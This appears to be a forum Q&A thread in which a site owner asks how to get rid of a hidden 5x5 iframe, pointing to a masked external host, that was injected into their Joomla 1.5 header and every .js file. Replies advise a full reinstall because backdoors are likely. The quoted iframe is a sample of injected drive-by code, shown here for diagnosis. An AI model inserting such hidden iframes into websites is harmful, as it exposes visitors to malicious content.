# All of a sudden this has been added to my joomla 1.5 website: xxxxxx.org/Lexmark?8

Tags: php, joomla, malware

Two days ago this started showing up in the header of our joomla 1.5 website:

```
<iframe src="http://xxxxxx.org/Lexmark?8" align="middle" frameborder="no" height="5" scrolling="auto" width="5">/iframe>
```

I cannot find any reference to it and don't know how it got there.  I cant remove it.  I tried everything including updating all plugins, removing plugins and components, etc.

Has anyone else encountered this and if so how do I get rid of this?

Update: It seems that every single .js file on the site now has the above line added to the end of it. Any way to remove them without downloading every single file and manually editing each one?

Comment: It's a Joomla! malware. There's a lot of subject on SO dealing with that.

Comment: You got hacked. Simply removing it won't solve your problem, they'll just hack you again.

Answer (score 0):

Congratulations, you got hacked.
This is usually due to using an older version of Joomla or the extensions installed, and even a kid could easily hack sites that don't update. 
Reinstall Joomla (the latest version of 2.5) and set up your site again. Don't try to fix the files, since you likely have backdoors.

Read this and follow every word:
http://docs.joomla.org/Security